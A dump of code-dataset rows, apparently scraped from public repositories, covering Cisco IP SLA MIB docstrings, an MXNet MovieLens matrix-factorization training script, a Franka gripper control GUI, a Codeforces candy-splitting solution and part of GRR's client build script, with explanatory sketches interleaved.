cipslatcpconntmplsrcaddr A string which specifies the IP address of the source **type**\: str **length:** 0..255 .. attribute:: cipslatcpconntmplsrcport This object represents the source's port number. If this object is not specified, the application will get a port allocated by the system **type**\: int **range:** 0..65535 .. attribute:: cipslatcpconntmpltimeout Specifies the duration to wait for an IP SLA operation completion. For connection oriented protocols, this may cause the connection to be closed by the operation. Once closed, it will be assumed that the connection reestablishment will be performed. 
To prevent unwanted closure of connections, be sure to set this value to a realistic connection timeout **type**\: int **range:** 0..604800000 **units**\: milliseconds .. attribute:: cipslatcpconntmplverifydata When set to true, the resulting data in each IP SLA operation is compared with the expected data. This includes checking header information (if possible) and exact packet size **type**\: bool .. attribute:: cipslatcpconntmpltos This object represents the type of service octet in an IP header **type**\: int **range:** 0..255 .. attribute:: cipslatcpconntmplthreshold This object defines an administrative threshold limit. If the IP SLA operation time exceeds this limit and if the condition specified in cipslaTcpConnTmplHistFilter is satisfied, one threshold crossing occurrence will be counted **type**\: int **range:** 0..2147483647 **units**\: milliseconds .. attribute:: cipslatcpconntmplhistlives The maximum number of history lives to record. A life is defined by the countdown (or transition) to zero by the cipslaAutoGroupScheduleLife object. A new life is created when the same conceptual control row is restarted via the transition of the cipslaAutoGroupScheduleLife object and its subsequent countdown. The value of zero will shut off all data collection **type**\: int **range:** 0..2 .. attribute:: cipslatcpconntmplhistbuckets The maximum number of history buckets to record. This value should be set to the number of operations to keep per lifetime. After cipslaTcpConnTmplHistBuckets are filled, the oldest entries are deleted and the most recent cipslaTcpConnTmplHistBuckets buckets are retained **type**\: int **range:** 1..60 .. attribute:: cipslatcpconntmplhistfilter Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaTcpConnTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded **type**\: :py:class:`CipslaTcpConnTmplHistFilter <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry.CipslaTcpConnTmplHistFilter>` .. attribute:: cipslatcpconntmplstatshours The maximum number of hours for which statistics are maintained. Specifically this is the number of hourly groups to keep before rolling over. The value of one is not advisable because the hourly group will close and immediately be deleted before the network management station will have the opportunity to retrieve the statistics. The value of zero will shut off data collection **type**\: int **range:** 0..25 **units**\: hours .. attribute:: cipslatcpconntmpldistbuckets The maximum number of statistical distribution buckets to accumulate. Since this index does not rollover, only the first cipslaTcpConnTmplDistBuckets will be kept. The last cipslaTcpConnTmplDistBuckets will contain all entries from its distribution interval start point to infinity **type**\: int **range:** 1..20 .. attribute:: cipslatcpconntmpldistinterval The statistical distribution buckets interval. 
Distribution Bucket Example\: cipslaTcpConnTmplDistBuckets = 5 buckets cipslaTcpConnTmplDistInterval = 10 milliseconds \| Bucket 1 \| Bucket 2 \| Bucket 3 \| Bucket 4 \| Bucket 5 \| \| 0\-9 ms \| 10\-19 ms \| 20\-29 ms \| 30\-39 ms \| 40\-Inf ms \| Odd Example\: cipslaTcpConnTmplDistBuckets = 1 buckets cipslaTcpConnTmplDistInterval = 10 milliseconds \| Bucket 1 \| \| 0\-Inf ms \| Thus, this odd example shows that the value of cipslaTcpConnTmplDistInterval does not apply when cipslaTcpConnTmplDistBuckets is one **type**\: int **range:** 1..100 **units**\: milliseconds .. attribute:: cipslatcpconntmplstoragetype The storage type of this conceptual row **type**\: :py:class:`StorageType <ydk.models.cisco_ios_xe.SNMPv2_TC.StorageType>` .. attribute:: cipslatcpconntmplrowstatus The status of the conceptual tcp connect control row. When the status is active, all the read\-create objects in that row can be modified **type**\: :py:class:`RowStatus <ydk.models.cisco_ios_xe.SNMPv2_TC.RowStatus>` CipslaTcpConnTmplHistFilter (Enum Class) Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaTcpConnTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded. .. data:: none = 1 .. data:: all = 2 .. data:: overThreshold = 3 .. data:: failures = 4 | 1.838984 | 2 |
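The template attributes documented in the row above describe how IP SLA RTT samples are binned into statistical distribution buckets (DistBuckets intervals of DistInterval milliseconds, with the last bucket open-ended) and filtered into the history buffer (none, all, overThreshold, failures). The short sketch below restates that bucketing and filtering rule in plain Python so the arithmetic is easy to check; it is only an illustration of the behaviour described in the docstrings, not part of the generated ydk model, and the function names are invented for the example.

# Minimal sketch of the bucketing/filtering semantics described above.
# Names (bucket_index, keep_in_history) are invented for illustration.

def bucket_index(rtt_ms, dist_buckets, dist_interval_ms):
    """Return the 0-based distribution bucket an RTT sample falls into.

    Buckets 0..dist_buckets-2 each cover dist_interval_ms milliseconds;
    the last bucket extends to infinity, matching the MIB description.
    """
    index = rtt_ms // dist_interval_ms
    return min(index, dist_buckets - 1)

def keep_in_history(hist_filter, completed, rtt_ms, threshold_ms):
    """Apply the cipsla*TmplHistFilter rule to one operation result."""
    if hist_filter == "none":
        return False
    if hist_filter == "all":
        return True
    if hist_filter == "overThreshold":
        return completed and rtt_ms > threshold_ms
    if hist_filter == "failures":
        return not completed
    raise ValueError("unknown filter: %s" % hist_filter)

# The docstring's example: 5 buckets, 10 ms interval -> 0-9, 10-19, ..., 40-inf.
assert bucket_index(7, 5, 10) == 0
assert bucket_index(23, 5, 10) == 2
assert bucket_index(120, 5, 10) == 4   # everything >= 40 ms lands in the last bucket
assert keep_in_history("overThreshold", True, 60, 50)
assert not keep_in_history("failures", True, 60, 50)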
example/model-parallel/matrix_factorization/train.py | tkameyama/incubator-mxnet | 1 | 8051 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import argparse
import logging
import time
import mxnet as mx
import numpy as np
from get_data import get_movielens_iter, get_movielens_data
from model import matrix_fact_model_parallel_net
logging.basicConfig(level=logging.DEBUG)
parser = argparse.ArgumentParser(description="Run model parallel version of matrix factorization",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--num-epoch', type=int, default=3,
help='number of epochs to train')
parser.add_argument('--batch-size', type=int, default=256,
help='number of examples per batch')
parser.add_argument('--print-every', type=int, default=100,
help='logging interval')
parser.add_argument('--factor-size', type=int, default=128,
help="the factor size of the embedding operation")
parser.add_argument('--num-gpus', type=int, default=2,
help="number of gpus to use")
MOVIELENS = {
'dataset': 'ml-10m',
'train': './ml-10M100K/r1.train',
'val': './ml-10M100K/r1.test',
'max_user': 71569,
'max_movie': 65135,
}
if __name__ == '__main__':
head = '%(asctime)-15s %(message)s'
logging.basicConfig(level=logging.INFO, format=head)
# arg parser
args = parser.parse_args()
logging.info(args)
num_epoch = args.num_epoch
batch_size = args.batch_size
optimizer = 'sgd'
factor_size = args.factor_size
print_every = args.print_every
num_gpus = args.num_gpus
momentum = 0.9
learning_rate = 0.1
# prepare dataset and iterators
max_user = MOVIELENS['max_user']
max_movies = MOVIELENS['max_movie']
get_movielens_data(MOVIELENS['dataset'])
train_iter = get_movielens_iter(MOVIELENS['train'], batch_size)
val_iter = get_movielens_iter(MOVIELENS['val'], batch_size)
# construct the model
net = matrix_fact_model_parallel_net(factor_size, factor_size, max_user, max_movies)
# construct the module
# map the ctx_group attribute to the context assignment
group2ctxs={'dev1':[mx.cpu()]*num_gpus, 'dev2':[mx.gpu(i) for i in range(num_gpus)]}
# Create the module, passing the group2ctxs argument, which maps each
# ctx_group attribute in the symbol to its assigned list of contexts
mod = mx.module.Module(symbol=net, context=[mx.cpu()]*num_gpus, data_names=['user', 'item'],
label_names=['score'], group2ctxs=group2ctxs)
# the initializer used to initialize the parameters
initializer = mx.init.Xavier(factor_type="in", magnitude=2.34)
# the parameters for the optimizer constructor
optimizer_params = {
'learning_rate': learning_rate,
'wd': 1e-4,
'momentum': momentum,
'rescale_grad': 1.0/batch_size}
# use MSE as the metric
metric = mx.gluon.metric.create(['MSE'])
speedometer = mx.callback.Speedometer(batch_size, print_every)
# start training
mod.fit(train_iter,
val_iter,
eval_metric = metric,
num_epoch = num_epoch,
optimizer = optimizer,
optimizer_params = optimizer_params,
initializer = initializer,
batch_end_callback = speedometer)
| # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import argparse
import logging
import time
import mxnet as mx
import numpy as np
from get_data import get_movielens_iter, get_movielens_data
from model import matrix_fact_model_parallel_net
logging.basicConfig(level=logging.DEBUG)
parser = argparse.ArgumentParser(description="Run model parallel version of matrix factorization",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--num-epoch', type=int, default=3,
help='number of epochs to train')
parser.add_argument('--batch-size', type=int, default=256,
help='number of examples per batch')
parser.add_argument('--print-every', type=int, default=100,
help='logging interval')
parser.add_argument('--factor-size', type=int, default=128,
help="the factor size of the embedding operation")
parser.add_argument('--num-gpus', type=int, default=2,
help="number of gpus to use")
MOVIELENS = {
'dataset': 'ml-10m',
'train': './ml-10M100K/r1.train',
'val': './ml-10M100K/r1.test',
'max_user': 71569,
'max_movie': 65135,
}
if __name__ == '__main__':
head = '%(asctime)-15s %(message)s'
logging.basicConfig(level=logging.INFO, format=head)
# arg parser
args = parser.parse_args()
logging.info(args)
num_epoch = args.num_epoch
batch_size = args.batch_size
optimizer = 'sgd'
factor_size = args.factor_size
print_every = args.print_every
num_gpus = args.num_gpus
momentum = 0.9
learning_rate = 0.1
# prepare dataset and iterators
max_user = MOVIELENS['max_user']
max_movies = MOVIELENS['max_movie']
get_movielens_data(MOVIELENS['dataset'])
train_iter = get_movielens_iter(MOVIELENS['train'], batch_size)
val_iter = get_movielens_iter(MOVIELENS['val'], batch_size)
# construct the model
net = matrix_fact_model_parallel_net(factor_size, factor_size, max_user, max_movies)
# construct the module
# map the ctx_group attribute to the context assignment
group2ctxs={'dev1':[mx.cpu()]*num_gpus, 'dev2':[mx.gpu(i) for i in range(num_gpus)]}
# Create the module, passing the group2ctxs argument, which maps each
# ctx_group attribute in the symbol to its assigned list of contexts
mod = mx.module.Module(symbol=net, context=[mx.cpu()]*num_gpus, data_names=['user', 'item'],
label_names=['score'], group2ctxs=group2ctxs)
# the initializer used to initialize the parameters
initializer = mx.init.Xavier(factor_type="in", magnitude=2.34)
# the parameters for the optimizer constructor
optimizer_params = {
'learning_rate': learning_rate,
'wd': 1e-4,
'momentum': momentum,
'rescale_grad': 1.0/batch_size}
# use MSE as the metric
metric = mx.gluon.metric.create(['MSE'])
speedometer = mx.callback.Speedometer(batch_size, print_every)
# start training
mod.fit(train_iter,
val_iter,
eval_metric = metric,
num_epoch = num_epoch,
optimizer = optimizer,
optimizer_params = optimizer_params,
initializer = initializer,
batch_end_callback = speedometer)
| en | 0.80025 | # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # arg parser # prepare dataset and iterators # construct the model # construct the module # map the ctx_group attribute to the context assignment # Creating a module by passing group2ctxs attribute which maps # the ctx_group attribute to the context assignment # the initializer used to initialize the parameters # the parameters for the optimizer constructor # use MSE as the metric # start training | 2.117392 | 2 |
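The train.py row above fits a MovieLens matrix-factorization model with a model-parallel MXNet Module, using group2ctxs to pin one operator group to CPU contexts (dev1) and the other to GPUs (dev2). The network itself lives in model.py, which is not included here, so the sketch below only illustrates the usual matrix-factorization prediction and the MSE quantity the script tracks, in NumPy; the embedding shapes and sample batch are invented for the example and assume a plain dot-product model.

import numpy as np

# Assumed factorization: each user u and item i gets a length-k embedding,
# and the predicted rating is their dot product.
rng = np.random.default_rng(0)
factor_size = 4          # stands in for --factor-size
num_users, num_items = 6, 5

user_emb = rng.normal(scale=0.1, size=(num_users, factor_size))
item_emb = rng.normal(scale=0.1, size=(num_items, factor_size))

def predict(user_ids, item_ids):
    """Predicted score for each (user, item) pair: dot product of embeddings."""
    return np.sum(user_emb[user_ids] * item_emb[item_ids], axis=1)

# One mini-batch of (user, item, score) triples, like the MovieLens iterator yields.
users = np.array([0, 1, 2])
items = np.array([3, 0, 4])
scores = np.array([4.0, 3.0, 5.0])

mse = np.mean((predict(users, items) - scores) ** 2)
print("batch MSE:", mse)   # the same quantity the script tracks via the 'MSE' metric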
scripts/libfranka_gui_gripper_run.py | nbfigueroa/franka_interactive_controllers | 6 | 8052 | #!/usr/bin/env python3
import shlex
from tkinter import *
from tkinter import messagebox
from psutil import Popen
top = Tk()
top.title("Franka Gripper Control")
top.geometry("300x75")
def open():
node_process = Popen(shlex.split('rosrun franka_interactive_controllers libfranka_gripper_run 1'))
messagebox.showinfo("Open Gripper", "Gripper Opened")
node_process.terminate()
def close():
node_process = Popen(shlex.split('rosrun franka_interactive_controllers libfranka_gripper_run 0'))
messagebox.showinfo("Close Gripper", "Gripper Closed")
node_process.terminate()
B1 = Button(top, text = "Open Gripper", command = open)
B1.place(x = 30,y = 20)
B2 = Button(top, text = "Close Gripper", command = close)
B2.place(x = 160,y = 20)
top.mainloop()
| #!/usr/bin/env python3
import shlex
from tkinter import *
from tkinter import messagebox
from psutil import Popen
top = Tk()
top.title("Franka Gripper Control")
top.geometry("300x75")
def open():
node_process = Popen(shlex.split('rosrun franka_interactive_controllers libfranka_gripper_run 1'))
messagebox.showinfo("Open Gripper", "Gripper Opened")
node_process.terminate()
def close():
node_process = Popen(shlex.split('rosrun franka_interactive_controllers libfranka_gripper_run 0'))
messagebox.showinfo("Close Gripper", "Gripper Closed")
node_process.terminate()
B1 = Button(top, text = "Open Gripper", command = open)
B1.place(x = 30,y = 20)
B2 = Button(top, text = "Close Gripper", command = close)
B2.place(x = 160,y = 20)
top.mainloop()
| fr | 0.221828 | #!/usr/bin/env python3 | 3.106617 | 3 |
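The GUI script above binds two Tkinter buttons to callbacks that spawn rosrun franka_interactive_controllers libfranka_gripper_run with argument 1 or 0 and pop a message box; its open() callback also shadows Python's built-in open, which is harmless here but easy to trip over as the script grows. A possible refactor is sketched below with a single parameterized helper and only the standard library (subprocess in place of psutil); the helper name and button wiring are choices made for the sketch, not part of the original script.

import shlex
import subprocess
import tkinter as tk
from tkinter import messagebox

GRIPPER_CMD = 'rosrun franka_interactive_controllers libfranka_gripper_run {arg}'

def run_gripper(arg, title, message):
    """Launch the gripper node with the given argument and report completion."""
    proc = subprocess.Popen(shlex.split(GRIPPER_CMD.format(arg=arg)))
    messagebox.showinfo(title, message)   # shown while/after the node runs
    proc.terminate()                      # mirror the original script's cleanup

root = tk.Tk()
root.title("Franka Gripper Control")
root.geometry("300x75")

# run_gripper avoids defining callbacks named open/close that shadow built-ins.
tk.Button(root, text="Open Gripper",
          command=lambda: run_gripper(1, "Open Gripper", "Gripper Opened")).place(x=30, y=20)
tk.Button(root, text="Close Gripper",
          command=lambda: run_gripper(0, "Close Gripper", "Gripper Closed")).place(x=160, y=20)

root.mainloop()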
codeforces.com/1669F/solution.py | zubtsov/competitive-programming | 0 | 8053 | <filename>codeforces.com/1669F/solution.py
for i in range(int(input())):
number_of_candies = int(input())
candies_weights = list(map(int, input().split()))
bob_pos = number_of_candies - 1
alice_pos = 0
bob_current_weight = 0
alice_current_weight = 0
last_equal_candies_total_number = 0
while alice_pos <= bob_pos:
if alice_current_weight <= bob_current_weight:
alice_current_weight += candies_weights[alice_pos]
alice_pos += 1
else:
bob_current_weight += candies_weights[bob_pos]
bob_pos -= 1
if alice_current_weight == bob_current_weight:
last_equal_candies_total_number = alice_pos + (number_of_candies - bob_pos - 1)
print(last_equal_candies_total_number)
| <filename>codeforces.com/1669F/solution.py
for i in range(int(input())):
number_of_candies = int(input())
candies_weights = list(map(int, input().split()))
bob_pos = number_of_candies - 1
alice_pos = 0
bob_current_weight = 0
alice_current_weight = 0
last_equal_candies_total_number = 0
while alice_pos <= bob_pos:
if alice_current_weight <= bob_current_weight:
alice_current_weight += candies_weights[alice_pos]
alice_pos += 1
else:
bob_current_weight += candies_weights[bob_pos]
bob_pos -= 1
if alice_current_weight == bob_current_weight:
last_equal_candies_total_number = alice_pos + (number_of_candies - bob_pos - 1)
print(last_equal_candies_total_number)
| none | 1 | 3.37836 | 3 |
|
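The solution above is the usual two-pointer greedy for this problem: Alice eats candies from the left, Bob from the right, whoever has the smaller running total (Alice on ties) eats next, and the recorded answer is the number of candies eaten at the last moment the two totals were equal. The function below restates the same loop with comments and a small self-check; the function name and test values are added for illustration only.

def max_equal_candies(weights):
    """Largest number of candies Alice (prefix) and Bob (suffix) can eat
    with equal total weight, never sharing a candy."""
    left, right = 0, len(weights) - 1      # next candy for Alice / Bob
    alice = bob = 0                        # running totals
    best = 0
    while left <= right:
        if alice <= bob:                   # Alice eats when behind or tied
            alice += weights[left]
            left += 1
        else:                              # otherwise Bob eats from the right
            bob += weights[right]
            right -= 1
        if alice == bob:                   # candies eaten so far with equal totals
            best = left + (len(weights) - right - 1)
    return best

# Example: Alice eats the first 10, Bob eats the last 10 -> 2 candies, totals 10 = 10.
assert max_equal_candies([10, 20, 10, 10]) == 2
assert max_equal_candies([7]) == 0         # a single candy can never be split evenly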
client/client_build.py | patriotemeritus/grr | 1 | 8054 | #!/usr/bin/env python
"""This tool builds or repacks the client binaries.
This handles invocations for the build across the supported platforms including
handling Visual Studio, pyinstaller and other packaging mechanisms.
"""
import logging
import os
import platform
import time
# pylint: disable=unused-import
from grr.client import client_plugins
# pylint: enable=unused-import
from grr.lib import build
from grr.lib import builders
from grr.lib import config_lib
from grr.lib import flags
from grr.lib import startup
parser = flags.PARSER
# Guess which arch we should be building based on where we are running.
if platform.architecture()[0] == "32bit":
default_arch = "i386"
else:
default_arch = "amd64"
default_platform = platform.system().lower()
parser.add_argument(
"--platform", choices=["darwin", "linux", "windows"],
default=default_platform,
help="The platform to build or repack for. This will default to "
"the current platform: %s." % platform.system())
parser.add_argument(
"--arch", choices=["amd64", "i386"],
default=default_arch,
help="The architecture to build or repack for.")
# Guess which package format we should be building based on where we are
# running.
if default_platform == "linux":
distro = platform.linux_distribution()[0]
if distro in ["Ubuntu", "debian"]:
default_package = "deb"
elif distro in ["CentOS Linux", "CentOS", "centos", "redhat", "fedora"]:
default_package = "rpm"
else:
default_package = None
elif default_platform == "darwin":
default_package = "dmg"
elif default_platform == "windows":
default_package = "exe"
parser.add_argument(
"--package_format", choices=["deb", "rpm"],
default=default_package,
help="The packaging format to use when building a Linux client.")
# Initialize sub parsers and their arguments.
subparsers = parser.add_subparsers(
title="subcommands", dest="subparser_name", description="valid subcommands")
# Build arguments.
parser_build = subparsers.add_parser(
"build", help="Build a client from source.")
parser_repack = subparsers.add_parser(
"repack", help="Repack a zip file into an installer (Only useful when "
"signing).")
parser_repack.add_argument("--template", default=None,
help="The template zip file to repack.")
parser_repack.add_argument("--output", default=None,
help="The path to write the output installer.")
parser_repack.add_argument("--outputdir", default="",
help="The directory to which we should write the "
"output installer. Installers will be named "
"automatically from config options. Incompatible"
" with --output")
parser_repack.add_argument("--debug_build", action="store_true", default=False,
help="Create a debug client.")
parser_repack.add_argument("-p", "--plugins", default=[], nargs="+",
help="Additional python files that will be loaded "
"as custom plugins.")
parser_deploy = subparsers.add_parser(
"deploy", help="Build a deployable self installer from a package.")
parser_deploy.add_argument("--template", default=None,
help="The template zip file to deploy.")
parser_deploy.add_argument("--templatedir", default="",
help="Directory containing template zip files to "
"repack. Incompatible with --template")
parser_deploy.add_argument("--output", default=None,
help="The path to write the output installer.")
parser_deploy.add_argument("--outputdir", default="",
help="The directory to which we should write the "
"output installer. Installers will be named "
"automatically from config options. Incompatible"
" with --output")
parser_deploy.add_argument("-p", "--plugins", default=[], nargs="+",
help="Additional python files that will be loaded "
"as custom plugins.")
parser_deploy.add_argument("--debug_build", action="store_true", default=False,
help="Create a debug client.")
parser_buildanddeploy = subparsers.add_parser(
"buildanddeploy",
help="Build and deploy clients for multiple labels and architectures.")
parser_buildanddeploy.add_argument("--template", default=None,
help="The template zip file to repack, if "
"none is specified we will build it.")
args = parser.parse_args()
def GetBuilder(context):
"""Get the appropriate builder based on the selected flags."""
try:
if args.platform == "darwin":
context = ["Platform:Darwin"] + context
builder_obj = builders.DarwinClientBuilder
elif args.platform == "windows":
context = ["Platform:Windows"] + context
builder_obj = builders.WindowsClientBuilder
elif args.platform == "linux":
if args.package_format == "deb":
context = ["Platform:Linux"] + context
builder_obj = builders.LinuxClientBuilder
elif args.package_format == "rpm":
context = ["Platform:Linux", "Target:LinuxRpm"] + context
builder_obj = builders.CentosClientBuilder
else:
parser.error("Couldn't guess packaging format for: %s" %
platform.linux_distribution()[0])
else:
parser.error("Unsupported build platform: %s" % args.platform)
except AttributeError:
raise RuntimeError("Unable to build for platform %s when running "
"on current platform." % args.platform)
return builder_obj(context=context)
def GetDeployer(context):
"""Get the appropriate client deployer based on the selected flags."""
if args.platform == "darwin":
context = ["Platform:Darwin"] + context
deployer_obj = build.DarwinClientDeployer
elif args.platform == "windows":
context = ["Platform:Windows"] + context
deployer_obj = build.WindowsClientDeployer
elif args.platform == "linux":
if args.package_format == "deb":
context = ["Platform:Linux"] + context
deployer_obj = build.LinuxClientDeployer
else:
context = ["Platform:Linux", "Target:LinuxRpm"] + context
deployer_obj = build.CentosClientDeployer
else:
parser.error("Unsupported build platform: %s" % args.platform)
return deployer_obj(context=context)
def TemplateInputFilename(context):
"""Build template file name from config."""
if args.templatedir:
filename = config_lib.CONFIG.Get("PyInstaller.template_filename",
context=context)
return os.path.join(args.templatedir, filename)
return None
def BuildAndDeploy(context):
"""Run build and deploy to create installers."""
# ISO 8601 date
timestamp = time.strftime("%Y-%m-%dT%H:%M:%S%z")
if args.plugins:
config_lib.CONFIG.Set("Client.plugins", args.plugins)
# Output directory like: 2015-02-13T21:48:47-0800/linux_amd64_deb/
spec = "_".join((args.platform, args.arch, args.package_format))
output_dir = os.path.join(config_lib.CONFIG.Get(
"ClientBuilder.executables_path", context=context), timestamp, spec)
# If we weren't passed a template, build one
if args.template:
template_path = args.template
else:
template_path = os.path.join(output_dir, config_lib.CONFIG.Get(
"PyInstaller.template_filename", context=context))
builder_obj = GetBuilder(context)
builder_obj.MakeExecutableTemplate(output_file=template_path)
# Get the list of contexts which we should be building.
context_list = config_lib.CONFIG.Get("ClientBuilder.BuildTargets")
logging.info("Building installers for: %s", context_list)
config_orig = config_lib.CONFIG.ExportState()
deployed_list = []
for deploycontext in context_list:
# Add the settings for this context
for newcontext in deploycontext.split(","):
config_lib.CONFIG.AddContext(newcontext)
context.append(newcontext)
try:
# If the ClientBuilder.target_platforms doesn't match our environment,
# skip.
if not config_lib.CONFIG.MatchBuildContext(args.platform, args.arch,
args.package_format):
continue
deployer = GetDeployer(context)
# Make a nicer filename out of the context string.
context_filename = deploycontext.replace(
"AllPlatforms Context,", "").replace(",", "_").replace(" ", "_")
deployed_list.append(context_filename)
output_filename = os.path.join(
output_dir, context_filename,
config_lib.CONFIG.Get("ClientBuilder.output_filename",
context=deployer.context))
logging.info("Deploying %s as %s with labels: %s", deploycontext,
config_lib.CONFIG.Get(
"Client.name", context=deployer.context),
config_lib.CONFIG.Get(
"Client.labels", context=deployer.context))
deployer.MakeDeployableBinary(template_path, output_filename)
finally:
# Remove the custom settings for the next deploy
for newcontext in deploycontext.split(","):
context.remove(newcontext)
config_lib.ImportConfigManger(config_orig)
logging.info("Complete, installers for %s are in %s", deployed_list,
output_dir)
def main(_):
"""Launch the appropriate builder."""
config_lib.CONFIG.AddContext(
"ClientBuilder Context",
"Context applied when we run the client builder script.")
startup.ClientInit()
# Make sure we have all the secondary configs since they may be set under the
# ClientBuilder Context
for secondconfig in config_lib.CONFIG["ConfigIncludes"]:
config_lib.CONFIG.LoadSecondaryConfig(secondconfig)
# Use basic console output logging so we can see what is happening.
logger = logging.getLogger()
handler = logging.StreamHandler()
handler.setLevel(logging.INFO)
logger.handlers = [handler]
# The following is used to change the identity of the builder based on the
# target platform.
context = flags.FLAGS.context
if args.arch == "amd64":
context.append("Arch:amd64")
else:
context.append("Arch:i386")
if args.subparser_name == "build":
builder_obj = GetBuilder(context)
builder_obj.MakeExecutableTemplate()
elif args.subparser_name == "repack":
if args.plugins:
config_lib.CONFIG.Set("Client.plugins", args.plugins)
if args.debug_build:
context += ["DebugClientBuild Context"]
deployer = GetDeployer(context)
output_filename = os.path.join(
args.outputdir, config_lib.CONFIG.Get(
"ClientBuilder.output_filename", context=deployer.context))
deployer.RepackInstaller(open(args.template, "rb").read(), args.output or
output_filename)
elif args.subparser_name == "deploy":
if args.plugins:
config_lib.CONFIG.Set("Client.plugins", args.plugins)
if args.debug_build:
context += ["DebugClientBuild Context"]
deployer = GetDeployer(context)
template_path = (args.template or TemplateInputFilename(deployer.context) or
config_lib.CONFIG.Get("ClientBuilder.template_path",
context=deployer.context))
# If neither the output filename nor the output directory is specified,
# use the default location from the config file.
output = None
if args.output:
output = args.output
elif args.outputdir:
# If output filename isn't specified, write to args.outputdir with a
# .deployed extension so we can distinguish it from repacked binaries.
filename = ".".join(
(config_lib.CONFIG.Get("ClientBuilder.output_filename",
context=deployer.context), "deployed"))
output = os.path.join(args.outputdir, filename)
deployer.MakeDeployableBinary(template_path, output)
elif args.subparser_name == "buildanddeploy":
BuildAndDeploy(context)
if __name__ == "__main__":
flags.StartMain(main)
| #!/usr/bin/env python
"""This tool builds or repacks the client binaries.
This handles invocations for the build across the supported platforms including
handling Visual Studio, pyinstaller and other packaging mechanisms.
"""
import logging
import os
import platform
import time
# pylint: disable=unused-import
from grr.client import client_plugins
# pylint: enable=unused-import
from grr.lib import build
from grr.lib import builders
from grr.lib import config_lib
from grr.lib import flags
from grr.lib import startup
parser = flags.PARSER
# Guess which arch we should be building based on where we are running.
if platform.architecture()[0] == "32bit":
default_arch = "i386"
else:
default_arch = "amd64"
default_platform = platform.system().lower()
parser.add_argument(
"--platform", choices=["darwin", "linux", "windows"],
default=default_platform,
help="The platform to build or repack for. This will default to "
"the current platform: %s." % platform.system())
parser.add_argument(
"--arch", choices=["amd64", "i386"],
default=default_arch,
help="The architecture to build or repack for.")
# Guess which package format we should be building based on where we are
# running.
if default_platform == "linux":
distro = platform.linux_distribution()[0]
if distro in ["Ubuntu", "debian"]:
default_package = "deb"
elif distro in ["CentOS Linux", "CentOS", "centos", "redhat", "fedora"]:
default_package = "rpm"
else:
default_package = None
elif default_platform == "darwin":
default_package = "dmg"
elif default_platform == "windows":
default_package = "exe"
parser.add_argument(
"--package_format", choices=["deb", "rpm"],
default=default_package,
help="The packaging format to use when building a Linux client.")
# Initialize sub parsers and their arguments.
subparsers = parser.add_subparsers(
title="subcommands", dest="subparser_name", description="valid subcommands")
# Build arguments.
parser_build = subparsers.add_parser(
"build", help="Build a client from source.")
parser_repack = subparsers.add_parser(
"repack", help="Repack a zip file into an installer (Only useful when "
"signing).")
parser_repack.add_argument("--template", default=None,
help="The template zip file to repack.")
parser_repack.add_argument("--output", default=None,
help="The path to write the output installer.")
parser_repack.add_argument("--outputdir", default="",
help="The directory to which we should write the "
"output installer. Installers will be named "
"automatically from config options. Incompatible"
" with --output")
parser_repack.add_argument("--debug_build", action="store_true", default=False,
help="Create a debug client.")
parser_repack.add_argument("-p", "--plugins", default=[], nargs="+",
help="Additional python files that will be loaded "
"as custom plugins.")
parser_deploy = subparsers.add_parser(
"deploy", help="Build a deployable self installer from a package.")
parser_deploy.add_argument("--template", default=None,
help="The template zip file to deploy.")
parser_deploy.add_argument("--templatedir", default="",
help="Directory containing template zip files to "
"repack. Incompatible with --template")
parser_deploy.add_argument("--output", default=None,
help="The path to write the output installer.")
parser_deploy.add_argument("--outputdir", default="",
help="The directory to which we should write the "
"output installer. Installers will be named "
"automatically from config options. Incompatible"
" with --output")
parser_deploy.add_argument("-p", "--plugins", default=[], nargs="+",
help="Additional python files that will be loaded "
"as custom plugins.")
parser_deploy.add_argument("--debug_build", action="store_true", default=False,
help="Create a debug client.")
parser_buildanddeploy = subparsers.add_parser(
"buildanddeploy",
help="Build and deploy clients for multiple labels and architectures.")
parser_buildanddeploy.add_argument("--template", default=None,
help="The template zip file to repack, if "
"none is specified we will build it.")
args = parser.parse_args()
def GetBuilder(context):
"""Get the appropriate builder based on the selected flags."""
try:
if args.platform == "darwin":
context = ["Platform:Darwin"] + context
builder_obj = builders.DarwinClientBuilder
elif args.platform == "windows":
context = ["Platform:Windows"] + context
builder_obj = builders.WindowsClientBuilder
elif args.platform == "linux":
if args.package_format == "deb":
context = ["Platform:Linux"] + context
builder_obj = builders.LinuxClientBuilder
